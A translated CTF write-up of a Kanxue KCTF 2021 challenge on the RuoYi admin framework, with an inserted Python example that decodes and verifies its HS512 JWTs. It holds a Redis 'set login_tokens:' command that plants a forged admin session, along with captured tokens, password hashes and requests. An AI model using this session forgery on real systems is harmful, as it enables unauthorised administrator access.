Let's see who these 17 teams are~
Team xwwei took "first blood" on this challenge in just 5353 seconds, with teams tacesrever and xtgo hot on their heels!
Challenge review
About the challenge authors
Challenge design
"{\"@type\":\"com.ruoyi.common.core.domain.model.LoginUser\",\"accountNonExpired\":true,\"accountNonLocked\":true,\"browser\":\"Chrome 9\",\"credentialsNonExpired\":true,\"enabled\":true,\"expireTime\":1690354819542,\"ipaddr\":\"117.175.182.182\",\"loginLocation\":\"XX XX\",\"loginTime\":1620354879542,\"os\":\"Windows 10\",\"password\":\"$2a$10$TbIq6QkLbP4MrjPaOJ2Y4.UqYYyChFC0HYrC7etAPI9iL1GOJ6ZLG\",\"permissions\":Set[\"*:*:*\"],\"token\":\"07aaf192-ca8f-4db7-a6a2-ee81dbf07d58\",\"user\":{\"admin\":true,\"avatar\":\"\",\"createBy\":\"admin\",\"createTime\":1620186031000,\"delFlag\":\"0\",\"dept\":{\"children\":[],\"deptId\":103,\"deptName\":\"\xe7\xa0\x94\xe5\x8f\x91\xe9\x83\xa8\xe9\x97\xa8\",\"leader\":\"\xe8\x8b\xa5\xe4\xbe\x9d\",\"orderNum\":\"1\",\"params\":{\"@type\":\"java.util.HashMap\"},\"parentId\":101,\"status\":\"0\"},\"deptId\":103,\"email\":\"[email protected]\",\"loginDate\":1620186031000,\"loginIp\":\"127.0.0.1\",\"nickName\":\"\xe8\x8b\xa5\xe4\xbe\x9d\",\"params\":{\"@type\":\"java.util.HashMap\"},\"password\":\"$2a$10$TbIq6QkLbP4MrjPaOJ2Y4.UqYYyChFC0HYrC7etAPI9iL1GOJ6ZLG\",\"phonenumber\":\"15888888888\",\"remark\":\"\xe7\xae\xa1\xe7\x90\x86\xe5\x91\x98\",\"roles\":[{\"admin\":true,\"dataScope\":\"1\",\"deptCheckStrictly\":false,\"flag\":false,\"menuCheckStrictly\":false,\"params\":{\"@type\":\"java.util.HashMap\"},\"roleId\":1,\"roleKey\":\"admin\",\"roleName\":\"\xe8\xb6\x85\xe7\xba\xa7\xe7\xae\xa1\xe7\x90\x86\xe5\x91\x98\",\"roleSort\":\"1\",\"status\":\"0\"}],\"sex\":\"1\",\"status\":\"0\",\"userId\":1,\"userName\":\"admin\"},\"username\":\"admin\"}"
Admin-Token:
eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6IjMxMDllYzNmLTZlODQtNDhmNS1iYzFmLTRmMzUxZDIzNjMzMyJ9.qKKRIGTkvIIaUnra_zr9D2iUYqfZPpPUGDnmX8A1OVJ-FDYFUrC-m5iNlg9JP0KSLfN2ho1U_SWnLXTnlRUAfQ
{"alg":"HS512"}{"login_user_key":"3109ec3f-6e84-48f5-bc1f-4f351d236111"}
set login_tokens:3109ec3f-6e84-48f5-bc1f-4f351d236333 "{\"@type\":\"com.ruoyi.common.core.domain.model.LoginUser\",\"accountNonExpired\":true,\"accountNonLocked\":true,\"browser\":\"Chrome 9\",\"credentialsNonExpired\":true,\"enabled\":true,\"expireTime\":1690354819542,\"ipaddr\":\"117.175.182.182\",\"loginLocation\":\"XX XX\",\"loginTime\":1620354879542,\"os\":\"Windows 10\",\"password\":\"$2a$10$TbIq6QkLbP4MrjPaOJ2Y4.UqYYyChFC0HYrC7etAPI9iL1GOJ6ZLG\",\"permissions\":Set[\"*:*:*\"],\"token\":\"07aaf192-ca8f-4db7-a6a2-ee81dbf07d58\",\"user\":{\"admin\":true,\"avatar\":\"\",\"createBy\":\"admin\",\"createTime\":1620186031000,\"delFlag\":\"0\",\"dept\":{\"children\":[],\"deptId\":103,\"deptName\":\"\xe7\xa0\x94\xe5\x8f\x91\xe9\x83\xa8\xe9\x97\xa8\",\"leader\":\"\xe8\x8b\xa5\xe4\xbe\x9d\",\"orderNum\":\"1\",\"params\":{\"@type\":\"java.util.HashMap\"},\"parentId\":101,\"status\":\"0\"},\"deptId\":103,\"email\":\"[email protected]\",\"loginDate\":1620186031000,\"loginIp\":\"127.0.0.1\",\"nickName\":\"\xe8\x8b\xa5\xe4\xbe\x9d\",\"params\":{\"@type\":\"java.util.HashMap\"},\"password\":\"$2a$10$TbIq6QkLbP4MrjPaOJ2Y4.UqYYyChFC0HYrC7etAPI9iL1GOJ6ZLG\",\"phonenumber\":\"15888888888\",\"remark\":\"\xe7\xae\xa1\xe7\x90\x86\xe5\x91\x98\",\"roles\":[{\"admin\":true,\"dataScope\":\"1\",\"deptCheckStrictly\":false,\"flag\":false,\"menuCheckStrictly\":false,\"params\":{\"@type\":\"java.util.HashMap\"},\"roleId\":1,\"roleKey\":\"admin\",\"roleName\":\"\xe8\xb6\x85\xe7\xba\xa7\xe7\xae\xa1\xe7\x90\x86\xe5\x91\x98\",\"roleSort\":\"1\",\"status\":\"0\"}],\"sex\":\"1\",\"status\":\"0\",\"userId\":1,\"userName\":\"admin\"},\"username\":\"admin\"}"
Challenge solution
This challenge solution was provided by Kanxue forum member KuCha128:
0x0 Finding the exploitable spot
0x1 The challenge's framework code
0x2 Analyzing login_tokens
login_tokens:1794d721-4eb1-4a7e-af46-da6261bf1301
{
  "@type":"com.ruoyi.common.core.domain.model.LoginUser",
  "accountNonExpired":true,
  "accountNonLocked":true,
  "browser":"Chrome 9",
  "credentialsNonExpired":true,
  "enabled":true,
  "expireTime":1680912666549,
  "ipaddr":"127.0.0.1",
  "loginLocation":"内网IP",
  "loginTime":1620912726549,
  "os":"Windows 10",
  "password":"$2a$10$7JB720yubVSZvUI0rEqK/.VqGOZTH.ulu33dHOiBE8ByOhJIrdAu2",
  "permissions":Set[
    "*:*:*"
  ],
  "token":"1794d721-4eb1-4a7e-af46-da6261bf1301",
  "user":{
    "admin":true,
    "avatar":"",
    "createBy":"admin",
    "createTime":1620902433000,
    "delFlag":"0",
    "dept":{
      "children":[
      ],
      "deptId":103,
      "deptName":"研发部门",
      "leader":"若依",
      "orderNum":"1",
      "params":{
        "@type":"java.util.HashMap"
      },
      "parentId":101,
      "status":"0"
    },
    "deptId":103,
    "email":"[email protected]",
    "loginDate":1620902433000,
    "loginIp":"127.0.0.1",
    "nickName":"若依",
    "params":{
      "@type":"java.util.HashMap"
    },
    "password":"$2a$10$7JB720yubVSZvUI0rEqK/.VqGOZTH.ulu33dHOiBE8ByOhJIrdAu2",
    "phonenumber":"15888888888",
    "remark":"管理员",
    "roles":[
      {
        "admin":true,
        "dataScope":"1",
        "deptCheckStrictly":false,
        "flag":false,
        "menuCheckStrictly":false,
        "params":{
          "@type":"java.util.HashMap"
        },
        "roleId":1,
        "roleKey":"admin",
        "roleName":"超级管理员",
        "roleSort":"1",
        "status":"0"
      }
    ],
    "sex":"1",
    "status":"0",
    "userId":1,
    "userName":"admin"
  },
  "username":"admin"
}
"userName":"admin"
"password":"$2a$10$7JB720yubVSZvUI0rEqK/.VqGOZTH.ulu33dHOiBE8ByOhJIrdAu2"
"token":"1794d721-4eb1-4a7e-af46-da6261bf1301"
GET /prod-api/getRouters HTTP/1.1
Host: vue.ruoyi.vip
Accept: application/json, text/plain, */*
Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6IjdiMjQ3YzFiLWVmNmYtNGE1MS05OTkxLTc5ODk0NDE5ZjQ4ZCJ9.c9z5AI3a0EpPx7bCStIq2JAsCiZDIKyt0PEE2YVrwyLDUop2N-gxoJKJquCrBJqQY1-DotWG-wKpPIIPMbIGtQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3868.400 QQBrowser/10.8.4394.400
Referer: http://vue.ruoyi.vip/login?redirect=%2Findex
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Admin-Token=eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6IjdiMjQ3YzFiLWVmNmYtNGE1MS05OTkxLTc5ODk0NDE5ZjQ4ZCJ9.c9z5AI3a0EpPx7bCStIq2JAsCiZDIKyt0PEE2YVrwyLDUop2N-gxoJKJquCrBJqQY1-DotWG-wKpPIIPMbIGtQ
Connection: close
/**
 * Token prefix
 */
public static final String TOKEN_PREFIX = "Bearer ";
0x3 JSON Web Token (JWT)
A token consists of three parts, in this order:
* header
* payload
* signature
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6IjIyYmRlZDJmLTNiOTYtNDNlYi1hNmMxLTMzMmExNTY1ZDM2OSJ9.IK5aHWqQDpT5HxNQ_L8F0C_DkCGxNXzzS5Jl0q3iAnEJybQL8cWbPiaaJodjMPkLZEKXhDhNdZFg2lKsaaXsWg
{"login_user_key":"22bded2f-3b96-43eb-a6c1-332a1565d369"}
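To make the JWT-to-Redis mapping described under 0x2 and 0x3 concrete, here is an added Python example (not code from the page or from RuoYi) that decodes the challenge token, derives the login_tokens:<login_user_key> key the server looks up, and verifies an HS512 signature by hand with hmac so that a forged or algorithm-downgraded token is rejected. The secret used for signing is a constructed placeholder; the real server-side signing key is not on the page.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional, Tuple

# Token from the writeup above; its payload carries only the Redis key suffix.
CHALLENGE_TOKEN = (
    "eyJhbGciOiJIUzUxMiJ9."
    "eyJsb2dpbl91c2VyX2tleSI6IjIyYmRlZDJmLTNiOTYtNDNlYi1hNmMxLTMzMmExNTY1ZDM2OSJ9."
    "IK5aHWqQDpT5HxNQ_L8F0C_DkCGxNXzzS5Jl0q3iAnEJybQL8cWbPiaaJodjMPkLZEKXhDhNdZFg2lKsaaXsWg"
)

def b64url_decode(s: str) -> bytes:
    # JWT segments are base64url without padding; restore it before decoding.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode("ascii")

def decode_unverified(token: str) -> Tuple[dict, dict]:
    # Decodes header and payload WITHOUT checking the signature: for inspection only.
    header_b64, payload_b64, _ = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))

def redis_session_key(payload: dict) -> str:
    # RuoYi stores the LoginUser object under login_tokens:<login_user_key>, so the
    # JWT is only a pointer; the admin flag and permissions live in Redis.
    return "login_tokens:" + payload["login_user_key"]

def sign_hs512(payload: dict, secret: bytes) -> str:
    header_b64 = b64url_encode(b'{"alg":"HS512"}')  # same header as the page's tokens
    payload_b64 = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    mac = hmac.new(secret, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha512).digest()
    return f"{header_b64}.{payload_b64}.{b64url_encode(mac)}"

def verify_hs512(token: str, secret: bytes) -> Optional[dict]:
    # Returns the payload only if the HS512 MAC matches under `secret`;
    # the algorithm is pinned so a token cannot downgrade itself to "none".
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        if json.loads(b64url_decode(header_b64)).get("alg") != "HS512":
            return None
        signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
        expected = hmac.new(secret, signing_input, hashlib.sha512).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return None
        return json.loads(b64url_decode(payload_b64))
    except (ValueError, AttributeError):
        return None
```

Because the session content itself sits in Redis, a correct signature check protects only the pointer; whoever can write login_tokens:* keys (as the set command in the design section shows) controls the session regardless of the JWT.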
0x4 Starting the attack
HTTP/1.1 200
Server: nginx
Date: Thu, 13 May 2021 17:05:58 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
Content-Length: 228
{"msg":"操作成功","code":200,"token":"eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6IjIyYmRlZDJmLTNiOTYtNDNlYi1hNmMxLTMzMmExNTY1ZDM2OSJ9.IK5aHWqQDpT5HxNQ_L8F0C_DkCGxNXzzS5Jl0q3iAnEJybQL8cWbPiaaJodjMPkLZEKXhDhNdZFg2lKsaaXsWg"}
0x5 End
Previous writeups
1. Kanxue · Sangfor 2021 KCTF Spring | Challenge 2 design and solution
Challenge 4 is now in full swing,